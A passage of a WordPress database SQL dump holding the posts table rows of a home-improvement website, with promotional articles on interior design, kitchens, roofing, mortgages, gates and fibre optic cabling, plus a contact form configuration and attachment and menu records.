`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=298 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (1,1,'2019-02-16 14:17:36','2019-02-16 14:17:36','<h2>Interior design services</h2>\r\nWe offer interior design services either for individual rooms, new extension builds or entire refurbishment projects.\r\n\r\nOur flexible interior design service range from design consultation, material specification, soft furnishings, new fitted kitchens, carpentry, and storage solutions to the finishing touches. <em>As well as detailed cost management and design team to bring your projects to life.</em>\r\n\r\nMany new home buyers make the mistake of confusing interior design with interior decoration, but these two disciplines are worlds apart.\r\n\r\nWhile it is true that design did naturally evolve from decoration, the technical know-how and skill set required for a designer is far more complex and complicated when compared to simple decoration.\r\n\r\nOther ways to <strong>redecorate your home</strong> is by arranging quality blinds or plantation shutters. These <em>create a different atmosphere to your home</em> making everything more put together. <a href=\"https://www.heartwoodshutters.com.au/\" target=\"_blank\">You can view more benefits here.</a>\r\n\r\n<strong>There are different products you could choose from:</strong>\r\n<ul>\r\n <li>Faux wood shutters</li>\r\n <li>Timber shutters</li>\r\n <li>Roman blinds</li>\r\n <li>Panel blinds</li>\r\n <li>Vertical blinds</li>\r\n <li>Roller blinds</li>\r\n</ul>\r\n<h2>What to do before, after and during your renovations</h2>\r\n<em>Finished your renovations? Builders left you to dispose of the waste?</em> If you are unable to dispose of the waste yourself, there is nobody better to hire than Diamond Waste services. This fully accredited company has years of experience in this field, disposing of all sorts of waste, including builders waste, office furniture, and even household rubbish.\r\n\r\nProfessional waste clearance services use their expertise to dispose of waste in a way that minimises the effects to the environment. If you know you aren\'t able to do this, we always recommend hiring somebody to do so.\r\n\r\nDiamond Waste prides itself on offering eco-friendly clearance services and is even approved by the Environment Agency as a dedication to the environment. Not safely disposing of waste can seriously harm the environment. <a href=\"http://diamondwaste.co.uk/what-does-waste-disposal-environment.php\" target=\"_blank\">Read more here</a>.\r\n\r\n<img class=\"alignnone size-full wp-image-59\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/02/household-rubbish.jpg\" alt=\"Household rubbish\" width=\"960\" height=\"720\" />\r\n<h2>What can interior design do for you?</h2>\r\nHaving a room professionally designed can be an excellent way to breathe new life into your home with additions like bespoke furniture, shaker kitchens etc and make you feel as if you have just stepped into an Ideal Homes magazine within your own home.\r\n\r\nWhen planning for additional designs for your home something that can be very beneficial to add to your interior home is underfloor heating.\r\n\r\nThis may be very useful for times when needed as it provides a more warm and welcoming home. There are many Underfloor heating options. <a href=\"https://www.allstarsystems.co.uk/heating/underfloor-heating/\" target=\"_blank\">Click here to view them.</a>\r\n\r\nAn interior designer can also transform a living space by making the most of the natural light sources in a way that an untrained person may be unable to envisage.\r\n\r\nDepending on your budget, you too may be able to bring a touch of interior design into your home. For those on a larger budget, you’ll be able to freshen up your whole home.\r\n\r\nWe Specialise in the commercial and residential sectors, designing bars, restaurants, hotels, offices, exhibition spaces, retail, show homes, and domestic living spaces.','Interior Design at Home','','publish','open','open','','interior-design-at-home','','','2019-03-11 12:45:52','2019-03-11 12:45:52','',0,'https://housing-today.co.uk/?p=1',0,'post','',0),(2,1,'2016-11-29 14:17:36','2016-11-29 14:17:36','Here at the Housing Today website we are determined to help people find out all they need to be a happy home owner.\r\n\r\nWe provide all tips and tricks to improve your property, especially to a standard that you are happy with. We will also provide you with services and local providers in and around Suffolk who we believe will be the best for you.\r\n\r\nThere are a number of different requirements for the perfect residential property so be careful when you start checking out the market and make sure you have something in your property that you love.\r\n\r\nA guideline for any potential home owners is to be aware of the basic rules of property development that govern the changes of your property. The basic rule of thumb of home ownership is to ensure you can get all the work you want to do to it at the lowest figure possible without skimping on quality, ensuring you get it to a level of finish that you want.\r\n\r\n<strong>St Andrews Street South</strong>\r\n\r\n<strong>Bury St Edmunds</strong>\r\n\r\n<strong>Suffolk</strong>\r\n\r\n<strong>IP33</strong>','About Housing Today','','publish','closed','open','','about-housing-today','','','2016-11-29 15:15:44','2016-11-29 15:15:44','',0,'https://housing-today.co.uk/?page_id=2',0,'page','',0),(6,1,'2016-11-29 15:16:03','2016-11-29 15:16:03','[contact-form-7 id=\"8\" title=\"Contact form 1\"]\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2442.963689453733!2d0.7089054157972028!3d52.24404317976287!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x47d84c45c7df90cb%3A0xdbf445be934511bd!2sSt+Andrew\'s+St+S%2C+Bury+Saint+Edmunds+IP33!5e0!3m2!1sen!2suk!4v1480432765756\" width=\"600\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','Contact Housing Today','','publish','closed','closed','','contact-housing-today','','','2016-11-29 15:21:00','2016-11-29 15:21:00','',0,'https://housing-today.co.uk/?page_id=6',0,'page','',0),(8,1,'2016-11-29 15:16:13','2016-11-29 15:16:13','<label> Your Name (required)\r\n [text* your-name] </label>\r\n\r\n<label> Your Email (required)\r\n [email* your-email] </label>\r\n\r\n<label> Subject\r\n [text your-subject] </label>\r\n\r\n<label> Your Message\r\n [textarea your-message] </label>\r\n\r\n[submit \"Send\"]\nHousing Today \"[your-subject]\"\n[your-name] <wordpress@housing-today.co.uk>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Housing Today (https://housing-today.co.uk)\nleads@vanillacircus.co.uk\nReply-To: [your-email]\n\n\n\n\nHousing Today \"[your-subject]\"\nHousing Today <wordpress@housing-today.co.uk>\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Housing Today (https://housing-today.co.uk)\n[your-email]\nReply-To: zoe.allen@vanillacircus.co.uk\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2016-12-01 12:32:12','2016-12-01 12:32:12','',0,'https://housing-today.co.uk/?post_type=wpcf7_contact_form&p=8',0,'wpcf7_contact_form','',0),(10,1,'2016-11-29 15:26:03','2016-11-29 15:26:03','','home','','inherit','open','closed','','home','','','2016-11-29 15:26:03','2016-11-29 15:26:03','',0,'http://housing-today.co.uk/wp-content/uploads/2016/11/home.jpg',0,'attachment','image/jpeg',0),(11,1,'2016-11-29 15:27:00','2016-11-29 15:27:00','','lost-places','','inherit','open','closed','','lost-places','','','2016-11-29 15:27:00','2016-11-29 15:27:00','',0,'http://housing-today.co.uk/wp-content/uploads/2016/11/lost-places.jpg',0,'attachment','image/jpeg',0),(13,1,'2016-11-29 15:31:07','2016-11-29 15:31:07','','interior-design','','inherit','open','closed','','interior-design','','','2016-11-29 15:31:07','2016-11-29 15:31:07','',1,'http://housing-today.co.uk/wp-content/uploads/2016/11/interior-design.jpg',0,'attachment','image/jpeg',0),(15,1,'2016-11-29 15:32:54','2016-11-29 15:32:54','<h2 class=\"LC20lb\">Planning - The Guide to Creating the Perfect Kitchen</h2>\nSince the kitchen is now seen as the hub of the household, you will more than likely want it to feel homely and warm.\n\nDespite their clean lines, minimal colour and <em><strong>smart design</strong></em>, even contemporary <a href=\"https://www.pinterest.co.uk/brendadrescher/luxury-kitchens/\" target=\"_blank\" rel=\"noopener noreferrer\">luxury kitchens</a> can appear welcoming.\n\nThis is often due to cleverly positioned lighting, which in turn works to create a homely atmosphere.\n<h2>Flooring</h2>\nAs well as <em><strong>granite worktops</strong></em>, some companies provide an extensive range of <a href=\"https://www.pinterest.co.uk/thetileshop/granite-tile/\" target=\"_blank\" rel=\"noopener noreferrer\">granite floor tiles</a> which can instantly add character to any room, whatever the style. As it is quite difficult to make a decision over the internet on which flooring will be the right ones for you we are here to help you create your perfect kitchen.\n\n<a href=\"http://www.besthomekitchenstuff.co.uk/different-types-flooring-homes/\" target=\"_blank\" rel=\"noopener noreferrer\">The Different Types of Flooring For Homes | What is the Best Flooring?</a>\n\n<img class=\"alignnone wp-image-71\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1.jpg\" alt=\"\" width=\"192\" height=\"128\" /><img class=\"alignnone wp-image-72\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/interior-design-2047075_960_720.jpg\" alt=\"\" width=\"171\" height=\"128\" /> <img class=\"alignnone wp-image-73\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2165756_960_720.jpg\" alt=\"\" width=\"196\" height=\"129\" /> <img class=\"alignnone wp-image-74\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2486092_960_720.jpg\" alt=\"\" width=\"195\" height=\"131\" /><img class=\"alignnone wp-image-77\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/retro-3249927_960_720.jpg\" alt=\"\" width=\"195\" height=\"130\" /> <img class=\"alignnone wp-image-78\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720.jpg\" alt=\"\" width=\"194\" height=\"129\" />\n\nDepending on your taste and the style of your kitchen it would be useful for you to already have an idea of which floor you would like to purchase.\n\nHardwood,<em> bamboo,</em> engineered timber, laminate, vinyl are <em><strong>all types of flooring</strong> </em>that you can choose from to enhance your kitchen at Timber Flooring Online. <a href=\"https://timberflooringonline.net.au/shop/\" target=\"_blank\" rel=\"noopener noreferrer\">Find out more</a>.\n\nSome things you would have to consider when planning to purchase a new style of flooring is the overall thickness of a product. You can find out more about the <em><strong>types of timber flooring</strong> </em>that are best suitable for your kitchen.\n<h2>Use up-to-date plumbing systems</h2>\n<a href=\"https://www.thebalance.com/steps-to-remodeling-your-kitchen-1798738\" target=\"_blank\" rel=\"noopener noreferrer\">Renovating your kitchen</a> can be made easier by upgrading any existing or out-of-date plumbing systems.\n\nNot only will the most recent plumbing systems improve the look of your kitchen, they will also ensure that water is heated and used efficiently to save energy and utilities costs.\n\nUse a recommended plumber to assist you with your kitchen installation. <a href=\"https://thejandpgroup.co.uk/plumbers-london/refurbishments/kitchen-installation\" target=\"_blank\" rel=\"noopener noreferrer\">More here. </a>\n\n<img class=\"alignnone wp-image-80\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers.jpg\" alt=\"\" width=\"341\" height=\"230\" /> <img class=\"alignnone wp-image-81\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg\" alt=\"\" width=\"387\" height=\"228\" />','Creating your perfect kitchen','','publish','open','open','','creating-your-perfect-kitchen','','','2021-02-01 12:30:24','2021-02-01 12:30:24','',0,'https://housing-today.co.uk/?p=15',0,'post','',0),(17,1,'2016-11-29 15:33:56','2016-11-29 15:33:56','','kitchen','','inherit','open','closed','','kitchen','','','2016-11-29 15:33:56','2016-11-29 15:33:56','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen.jpg',0,'attachment','image/jpeg',0),(19,1,'2016-11-29 15:37:33','2016-11-29 15:37:33','Your roof is the largest feature on the outside of your home - without being well maintained this can have <a href=\"http://www.buildings.com/article-details/articleid/1735/title/the-top-10-most-common-roof-problems\" target=\"_blank\" rel=\"noopener noreferrer\">serious effects</a> on the <a href=\"https://housing-today.co.uk/interior-design-at-home/\">interior of your house</a>, as well as the outside. It even pays off to have an attractive build as it improves the look of your house and can change it into something much different.\r\n<h2>So what type of roof can do it best?</h2>\r\nThe installation of a flat roof can transform your home from being drab and boring, to the most exciting house on the block.\r\n\r\n<strong>We have been providing roofing advice in Suffolk for many years.<a href=\"http://elcroofing.co.uk/suffolk/Felixstowe\" target=\"_blank\" rel=\"noopener noreferrer\"><img class=\"alignright\" style=\"margin: 10px;\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/roof-plate.jpg\" alt=\"roof-plate\" width=\"50%\" height=\"auto\" align=\"right\" /></a></strong>\r\n\r\n<strong>A </strong><strong>New Flat Roof</strong> installed in Felixstowe, Suffolk can <a href=\"https://www.homebuilding.co.uk/flat-roofs/\" target=\"_blank\" rel=\"noopener noreferrer\">provide real benefits</a>, warmer and more comfortable rooms, <a href=\"https://www.angieslist.com/articles/5-ways-new-roof-can-save-you-money.htm\" target=\"_blank\" rel=\"noopener noreferrer\">lower energy bills</a> and an improved HIP rating for a start.\r\n\r\n<a href=\"http://www.trademansblog.co.uk/flat-roofing-materials/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Flat Roof Options:</strong></a>\r\n<ul>\r\n <li>Alwitra single ply membrane - The ultimate system in flat roofing</li>\r\n <li>Firestone - A one piece flat roofing system</li>\r\n <li>Tectofin RV - Acrylic synthetic rubber method</li>\r\n <li>Fibre Glass - No leaks, no rotting and non slip</li>\r\n <li>Liquid Rubber - For a seamless waterproof membrane</li>\r\n <li>EPDM rubber roofing - Lasts up to 50 years</li>\r\n <li>Asphalt - Continuous waterproof covering</li>\r\n <li>Anderson torch-on - High performance approved layers</li>\r\n <li>High performance Built Up Felt - 180 and 250 polyester</li>\r\n</ul>\r\nOur target is to provide you with the best possible <a href=\"http://elcroofing.co.uk/suffolk/Felixstowe\" target=\"_blank\" rel=\"noopener noreferrer\">flat roofing solutions</a> which will both enhance the look of your home, and protect it from the elements.\r\n<h2>Embrace Your Outdoor Space with Blinds and Awnings</h2>\r\nAnother dependable solution for expanding your home into the great outdoors is to buy and install an awning to the exterior of your home. You’ll be surprised at the contemporary designs available. If you’re really looking to revitalise your outdoor space, <a href=\"https://shadeland.com.au/blinds-awnings/\" target=\"_blank\" rel=\"noopener noreferrer\">blinds and awnings</a> make a great combination.\r\n\r\nBy browsing and purchasing blinds and awnings made of the highest quality, you can ensure that they’ll guarantee you maximum protection from the sun, even on the hottest days!\r\n\r\nIf you’re looking for something to provide shade across a large area, <a href=\"https://shadeland.com.au/shade-sails-structures/\" target=\"_blank\" rel=\"noopener noreferrer\">shade sails</a> might be exactly what you’re looking for.','Creating The Perfect Outside','','publish','open','open','','creating-perfect-outside','','https://www.homebuilding.co.uk/flat-roofs/\nhttps://housing-today.co.uk/interior-design-at-home/','2021-03-09 11:56:14','2021-03-09 11:56:14','',0,'https://housing-today.co.uk/?p=19',0,'post','',0),(20,1,'2016-11-29 15:37:24','2016-11-29 15:37:24','','roofs','','inherit','open','closed','','roofs','','','2016-11-29 15:37:24','2016-11-29 15:37:24','',19,'http://housing-today.co.uk/wp-content/uploads/2016/11/roofs.jpg',0,'attachment','image/jpeg',0),(25,1,'2016-11-29 15:57:46','2016-11-29 15:57:46','','roof-plate','','inherit','open','closed','','roof-plate','','','2016-11-29 15:57:46','2016-11-29 15:57:46','',19,'http://housing-today.co.uk/wp-content/uploads/2016/11/roof-plate.jpg',0,'attachment','image/jpeg',0),(27,1,'2016-11-29 16:02:58','2016-11-29 16:02:58','','Perfect Outside','','publish','closed','closed','','27','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/27/',5,'nav_menu_item','',0),(28,1,'2016-11-29 16:02:58','2016-11-29 16:02:58','','perfect kitchen','','publish','closed','closed','','perfect-kitchen','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/perfect-kitchen/',4,'nav_menu_item','',0),(29,1,'2016-11-29 16:02:58','2016-11-29 16:02:58','','Interior Design','','publish','closed','closed','','29','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/29/',2,'nav_menu_item','',0),(30,1,'2016-11-29 16:02:58','2016-11-29 16:02:58','','Home','','publish','closed','closed','','home','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/home/',1,'nav_menu_item','',0),(31,1,'2016-11-29 16:02:59','2016-11-29 16:02:59','','Contact','','publish','closed','closed','','31','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/31/',8,'nav_menu_item','',0),(32,1,'2016-11-29 16:02:59','2016-11-29 16:02:59','','About','','publish','closed','closed','','32','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/32/',7,'nav_menu_item','',0),(33,1,'2016-11-29 16:04:14','2016-11-29 16:04:14','','cropped-lost-places.jpg','','inherit','open','closed','','cropped-lost-places-jpg','','','2016-11-29 16:04:14','2016-11-29 16:04:14','',0,'http://housing-today.co.uk/wp-content/uploads/2016/11/cropped-lost-places.jpg',0,'attachment','image/jpeg',0),(35,1,'2018-05-03 13:11:47','2018-05-03 13:11:47','In today\'s world finding finance is becoming increasingly difficult, Housing Today, The one stop shop for <strong>mortgages</strong> and <strong>remortgages</strong> could give you access to many loan & mortgage providers and advice so you can choose the right property loan for you.\r\n\r\nWith so many different lenders available, we could help you find loans or mortgages in a variety of different circumstances, with cheaper low rates for customers with a clean credit history, through to specialised loan plans for people who may have been refused credit in the past. <a href=\"http://www.wfdd.org.uk/index-html/\" target=\"_blank\">Click here for mortgage advice</a>.\r\n\r\n<em>Housing Today wants to help you reduce your monthly outgoings.</em> Perhaps you want to reduce your monthly bills with an insurance comparison service with many of the leading car & home insurance providers. Our staff could also help you switch energy providers to reduce your monthly electric, gas & phone bills.\r\n\r\nIn addition to helping you save money, Housing Today could advise you on how to make the most out of your savings.\r\n<h2>How to finance your property development?</h2>\r\nOnce you have correctly counted all project costs, you can then assess how profitable your project could end up being. This information may be required by your lender.\r\n\r\nHousing Today recommends a private lender compared to a bank as the approval and transfer of money is much faster, meaning you can begin your project sooner, rather than later. <a href=\"https://www.hunterfinance.co.uk/contact-us\" target=\"_blank\">Contact Hunter Finance</a> for more information on how you can fund your project and receive development finance.','Mortgages, remortgages and finance to suit your needs','','publish','open','open','','mortgages-remortgages-finance-suit-needs','','','2018-05-03 13:12:27','2018-05-03 13:12:27','',0,'https://housing-today.co.uk/?p=35',0,'post','',0),(37,1,'2018-05-03 13:12:25','2018-05-03 13:12:25','','builder','','inherit','open','closed','','builder','','','2018-05-03 13:12:25','2018-05-03 13:12:25','',35,'http://housing-today.co.uk/wp-content/uploads/2018/05/builder.jpg',0,'attachment','image/jpeg',0),(59,1,'2019-03-11 12:45:40','2019-03-11 12:45:40','','household-rubbish','','inherit','closed','closed','','household-rubbish','','','2019-03-11 12:45:47','2019-03-11 12:45:47','',1,'http://housing-today.co.uk/wp-content/uploads/2019/02/household-rubbish.jpg',0,'attachment','image/jpeg',0),(68,1,'2019-03-13 15:37:04','2019-03-13 15:37:04','','wood-fibre-boards-2728937_960_720','','inherit','closed','closed','','wood-fibre-boards-2728937_960_720','','','2019-03-13 15:37:04','2019-03-13 15:37:04','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720.jpg',0,'attachment','image/jpeg',0),(71,1,'2019-03-13 15:37:43','2019-03-13 15:37:43','','wood-fibre-boards-2728937_960_720','','inherit','closed','closed','','wood-fibre-boards-2728937_960_720-2','','','2019-03-13 15:37:43','2019-03-13 15:37:43','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1.jpg',0,'attachment','image/jpeg',0),(72,1,'2019-03-13 15:39:33','2019-03-13 15:39:33','','interior-design-2047075_960_720','','inherit','closed','closed','','interior-design-2047075_960_720','','','2019-03-13 15:39:33','2019-03-13 15:39:33','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/interior-design-2047075_960_720.jpg',0,'attachment','image/jpeg',0),(73,1,'2019-03-13 15:39:34','2019-03-13 15:39:34','','kitchen-2165756_960_720','','inherit','closed','closed','','kitchen-2165756_960_720','','','2019-03-13 15:39:34','2019-03-13 15:39:34','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2165756_960_720.jpg',0,'attachment','image/jpeg',0),(74,1,'2019-03-13 15:39:35','2019-03-13 15:39:35','','kitchen-2486092_960_720','','inherit','closed','closed','','kitchen-2486092_960_720','','','2019-03-13 15:39:35','2019-03-13 15:39:35','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2486092_960_720.jpg',0,'attachment','image/jpeg',0),(77,1,'2019-03-13 15:41:15','2019-03-13 15:41:15','','retro-3249927_960_720','','inherit','closed','closed','','retro-3249927_960_720','','','2019-03-13 15:41:15','2019-03-13 15:41:15','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/retro-3249927_960_720.jpg',0,'attachment','image/jpeg',0),(78,1,'2019-03-13 15:41:15','2019-03-13 15:41:15','','wood-fibre-boards-2928524_960_720','','inherit','closed','closed','','wood-fibre-boards-2928524_960_720','','','2019-03-13 15:41:15','2019-03-13 15:41:15','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720.jpg',0,'attachment','image/jpeg',0),(80,1,'2019-03-13 15:44:54','2019-03-13 15:44:54','','taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers','','inherit','closed','closed','','taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers','','','2019-03-13 15:44:54','2019-03-13 15:44:54','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers.jpg',0,'attachment','image/jpeg',0),(81,1,'2019-03-13 15:44:54','2019-03-13 15:44:54','','White-Modern-Kitchen','','inherit','closed','closed','','white-modern-kitchen','','','2019-03-13 15:44:54','2019-03-13 15:44:54','',15,'http://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg',0,'attachment','image/jpeg',0),(88,1,'2019-05-09 14:13:49','2019-05-09 14:13:49','<img class=\"alignnone size-full wp-image-89\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/05/automatic-gates.jpg\" alt=\"Automatic Gates\" width=\"960\" height=\"640\" />\r\n\r\nAn automatic gate is a great addition to any home. Continue reading to see what benefits you can soak up with this great investment.\r\n\r\nThe main benefit of having an automatic gate is the increased levels of security. Everybody should feel safe and secure in their home and automatic gates is the best way to do this by boosting security. In addition, you can combine electric gates with cameras and voice control system meaning you have the ultimate control of who enters your property.\r\n\r\nMany home owners choose automatic swing gates. These can also be <a href=\"https://erreka-automaticdoors.uk.com/shop/automatic-gates/gate-activation/iris-key-fob-transmitter/\" target=\"_blank\">opened with a key fob transmitter</a> which is great when you want to park on your driveway with ease.\r\n<h2>Increase in Property Value</h2>\r\nPeople don\'t really consider the property value benefits of installing automatic gates. Automatic gates are generally viewed as being more attractive and prestigious, which creates a more luxury feeling. A potential buyer would be more likely to pay a higher amount for your property, especially compared to people without an automatic gate.\r\n<blockquote>Read this article: <a href=\"https://tampasteel.com/how-an-electric-gate-can-add-value-to-your-home/\" target=\"_blank\">How an Electric Gate Adds Value to Your Home</a>.</blockquote>\r\nDepending on the company you choose, you can customise the gates to be more attractive for example the colour and design features to really make a statement.\r\n<h2>Improved Safety of Children & Pets</h2>\r\nYou can feel free knowing your children and pets are safe anywhere on your property. Having automatic gates mean you can keep the gates locked which allow your children to play safely outside without the worry of them being able to leave. <a href=\"http://aautomaticgate.com/4-benefits-of-having-an-automatic-gate-at-your-home/\" target=\"_blank\">View more benefits</a>.\r\n\r\n<em>Pets can also enjoy more freedom, whilst still in the boundary of your property.</em>\r\n<h2>Better Privacy</h2>\r\nIntrusive salesmen and solicitors won\'t be able to interrupt your day by offering their services. An automatic gate prevents you from having to refuse them at the door, which can be much harder when they are right at your front door.\r\n\r\nAlso, with advanced designs, automatic gates allow you and your family to enjoy an evening in the front garden without the prying eyes of neighbours or passersby.','Why Choose Automatic Gates for your Home?','','publish','closed','closed','','choose-automatic-gates-home','','','2019-05-09 14:14:14','2019-05-09 14:14:14','',0,'https://housing-today.co.uk/?page_id=88',0,'page','',0),(89,1,'2019-05-09 14:13:40','2019-05-09 14:13:40','','automatic-gates','','inherit','closed','closed','','automatic-gates','','','2019-05-09 14:13:47','2019-05-09 14:13:47','',88,'http://housing-today.co.uk/wp-content/uploads/2019/05/automatic-gates.jpg',0,'attachment','image/jpeg',0),(92,1,'2019-05-09 14:14:47','2019-05-09 14:14:47','','Automatic Gates','','publish','closed','closed','','automatic-gates','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',0,'https://housing-today.co.uk/?p=92',6,'nav_menu_item','',0),(94,1,'2019-06-14 13:08:12','2019-06-14 13:08:12','<strong>How much does it cost to install fibre optic cable?</strong>\r\n\r\nIf you were starting from scratch where a building had no cabling at all, Ethernet cables would be a cheaper option than fibre optic cables. Likewise, replacing Ethernet cables with fibre optic cables would come at a cost and cause a small disruption while the work is carried out.\r\n\r\nA comparison of fibre optic packages from <a href=\"https://www.broadbandchoices.co.uk/business/fibre-optic-business-broadband\">Broadband choices</a> shows prices generally range from £20-35 per month although there are a few cheaper and more expensive options outside of that range.\r\n\r\nUltimately, it depends on what type of installation package you choose so it helps to shop around. The higher the promised internet speeds, the higher the cost.\r\n\r\nYou need to decide what is sufficient for your home or business so you should consider how much data is processed, how sensitive the data is and the importance of how quickly the data is communicated. See <a href=\"https://network-data-cabling.co.uk/fibre-optic-installation/\">Fibre Optic Installation for business (London).</a>\r\n\r\n \r\n\r\n<strong><img class=\"wp-image-99 size-medium alignright\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/06/fibre-optic-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Why is Fibre Optic Better?</strong>\r\n\r\nTraditional wires, mainly copper, transmits data through electrical currents. Fibre optic cables transmit data through pulses of light. This is generated by a light emitting diode. This allows fibre optic to produce faster connection speeds without being limited. See: <a href=\"https://www.abc.net.au/science/articles/2010/10/21/3044463.htm\" target=\"_blank\">Why is fibre optic technology \'faster\' than copper? › Ask an Expert (ABC Science)</a>\r\n\r\nFurthermore, IT professionals prefer to install fibre optic cables because they aren’t a fire hazard. Because there is no electric current.\r\n\r\n \r\n<h3 id=\"post-766\" class=\"storytitle\">BT’s fibre optic plans anger competitors</h3>\r\nBT has announced plans to triple its investment in fibre optic cables, making high-speed internet access available to millions of homes.\r\n\r\n£1.5 billion investment is needed from the company to make lightening speed fibre optic broadband available to 10 million homes by 2012.\r\n\r\nSpeeds of up to 100mps - 50 times the current average connection speed - would mean that customers could download high definition TV programmes direct to their computer.\r\n\r\n \r\n\r\n<a href=\"http://www.timyeo.org.uk/bts-fibre-optic-plans-anger-competitors/\" target=\"_blank\">Read on?</a>','Fibre Optic Cabling Installation','','publish','closed','closed','','fibre-optic-cabling-installation','','','2019-06-14 13:14:23','2019-06-14 13:14:23','',0,'https://housing-today.co.uk/?p=94',0,'post','',0),(96,1,'2019-06-14 13:08:51','2019-06-14 13:08:51','','fiber-optic-2749588_960_720','','inherit','closed','closed','','fiber-optic-2749588_960_720','','','2019-06-14 13:08:51','2019-06-14 13:08:51','',94,'http://housing-today.co.uk/wp-content/uploads/2019/06/fiber-optic-2749588_960_720.jpg',0,'attachment','image/jpeg',0),(99,1,'2019-06-14 13:11:12','2019-06-14 13:11:12','','fibre optic','','inherit','closed','closed','','fibre-optic','','','2019-06-14 13:11:12','2019-06-14 13:11:12','',94,'http://housing-today.co.uk/wp-content/uploads/2019/06/fibre-optic.jpg',0,'attachment','image/jpeg',0),(105,1,'2019-08-12 10:46:50','2019-08-12 10:46:50','<h2>Five key things to consider when choosing an electrician</h2>\r\n<div id=\"boxed-wrapper\">\r\n<div id=\"wrapper\" class=\"fusion-wrapper\">\r\n<div class=\"fusion-row\"><section id=\"content\"><article id=\"post-12015\" class=\"post post-12015 type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized\">\r\n<div class=\"post-content\">\r\n\r\n<span id=\"more-12015\"><img class=\"size-medium wp-image-99 alignleft\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/06/fibre-optic-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" /></span>\r\n\r\nIt can be difficult to find the right tradesperson for you when having any work done in your home, especially when you want quality work for a good price. Below are the five most important factors to consider when choosing an electrician\r\n\r\n \r\n<h3>Right tradesman</h3>\r\nThe number one factor to consider when choosing a contractor is whether they are authorised to do the job. Having a licensed tradesperson guarantees that the job will be done safely and correctly as they will have all of the necessary training and qualifications.\r\n\r\nYou should always ask for the relevant information and documents, such as a license and insurance. They must be in date. You should be aware that some licenses and insurance have restrictions so it is important to check that they cover the work you need to be done. <a href=\"https://housing-today.co.uk/contact-housing-today\">Contact us for more information.</a>\r\n<h3>Qualifications and experience</h3>\r\nAll tradespeople work at different levels, therefore it is important to know what level your electrician can work at. Master electricians have a minimum of three years experience and guarantee a 12-month warranty on their work. <a href=\"https://www.tradeskills4u.co.uk/pages/electrician-courses\" 